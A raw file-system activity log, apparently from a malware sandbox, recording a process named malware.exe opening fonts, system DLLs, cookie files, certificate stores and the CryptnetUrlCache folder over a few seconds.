29/2/2020 - 1:46:44.668Open1480C:\malware.exeC:\Windows\Fonts\georgiai.ttf
29/2/2020 - 1:46:44.668Open1480C:\malware.exeC:\Windows\Fonts\georgiai.ttf
29/2/2020 - 1:46:44.762Open1480C:\malware.exeC:\Windows\Fonts\georgiai.ttf
29/2/2020 - 1:46:44.762Open1480C:\malware.exeC:\Windows\Fonts\georgiab.ttf
29/2/2020 - 1:46:49.840Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\BNF7CK3S.txt
29/2/2020 - 1:46:49.840Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\BNF7CK3S.txt
29/2/2020 - 1:46:49.840Write1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\BNF7CK3S.txt
29/2/2020 - 1:46:49.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
29/2/2020 - 1:46:49.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
29/2/2020 - 1:46:49.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\GGJ30VTU.txt
29/2/2020 - 1:46:49.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\GGJ30VTU.txt
29/2/2020 - 1:46:49.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\GGJ30VTU.txt
29/2/2020 - 1:46:49.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\GGJ30VTU.txt
29/2/2020 - 1:46:49.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\GGJ30VTU.txt
29/2/2020 - 1:46:49.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\GGJ30VTU.txt
29/2/2020 - 1:46:49.903Write1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\GGJ30VTU.txt
29/2/2020 - 1:46:49.903Write1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\GGJ30VTU.txt
29/2/2020 - 1:46:49.903Write1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\GGJ30VTU.txt
29/2/2020 - 1:46:49.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates
29/2/2020 - 1:46:49.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates
29/2/2020 - 1:46:49.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs
29/2/2020 - 1:46:49.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs
29/2/2020 - 1:46:49.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs
29/2/2020 - 1:46:49.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs
29/2/2020 - 1:46:50.75Open1480C:\malware.exeC:\credssp.dll
29/2/2020 - 1:46:50.75Open1480C:\malware.exeC:\Windows\SysWOW64\credssp.dll
29/2/2020 - 1:46:50.75Open1480C:\malware.exeC:\Windows\SysWOW64\credssp.dll
29/2/2020 - 1:46:50.75Open1480C:\malware.exeC:\Windows\SysWOW64\schannel.dll
29/2/2020 - 1:46:50.75Open1480C:\malware.exeC:\Windows\SysWOW64\schannel.dll
29/2/2020 - 1:46:50.75Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My
29/2/2020 - 1:46:50.75Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates
29/2/2020 - 1:46:50.75Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates
29/2/2020 - 1:46:50.75Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs
29/2/2020 - 1:46:50.75Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs
29/2/2020 - 1:46:50.75Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs
29/2/2020 - 1:46:50.75Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs
29/2/2020 - 1:46:50.153Open1480C:\malware.exeC:\cryptnet.dll
29/2/2020 - 1:46:50.153Open1480C:\malware.exeC:\Windows\SysWOW64\cryptnet.dll
29/2/2020 - 1:46:50.153Open1480C:\malware.exeC:\Windows\SysWOW64\cryptnet.dll
29/2/2020 - 1:46:50.168Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:50.168Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:50.168Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:50.168Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_5FA8E5E800867BF860DF5E533E701BAF
29/2/2020 - 1:46:50.168Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\85B3F147E3624A14E6A20DB4F6C2C5D9
29/2/2020 - 1:46:50.168Open1480C:\malware.exeC:\SensApi.dll
29/2/2020 - 1:46:50.168Open1480C:\malware.exeC:\Windows\SysWOW64\SensApi.dll
29/2/2020 - 1:46:50.168Open1480C:\malware.exeC:\Windows\SysWOW64\SensApi.dll
29/2/2020 - 1:46:50.184Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.184Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.184Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.184Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.184Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:50.184Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:50.231Open1480C:\malware.exeC:\WINHTTP.dll
29/2/2020 - 1:46:50.231Open1480C:\malware.exeC:\Windows\SysWOW64\winhttp.dll
29/2/2020 - 1:46:50.231Open1480C:\malware.exeC:\Windows\SysWOW64\winhttp.dll
29/2/2020 - 1:46:50.231Open1480C:\malware.exeC:\webio.dll
29/2/2020 - 1:46:50.231Open1480C:\malware.exeC:\Windows\SysWOW64\webio.dll
29/2/2020 - 1:46:50.231Open1480C:\malware.exeC:\Windows\SysWOW64\webio.dll
29/2/2020 - 1:46:50.418Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.418Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.418Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.418Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.418Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:50.700Open1480C:\malware.exeC:\Windows\SysWOW64\wininet.dll
29/2/2020 - 1:46:50.700Open1480C:\malware.exeC:\Windows\SysWOW64\wininet.dll
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Read1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Read1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Read1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_C603C4E90ACAD3CB9C280DB62660607F
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\521F25E202FF760B8461B88413F425E7
29/2/2020 - 1:46:51.434Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.434Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.434Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.434Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.434Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.434Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.575Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.575Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.575Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.575Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.575Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.622Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.622Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.622Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.622Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
29/2/2020 - 1:46:51.622Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
29/2/2020 - 1:46:51.622Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.622Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.622Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.622Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.622Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Read1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
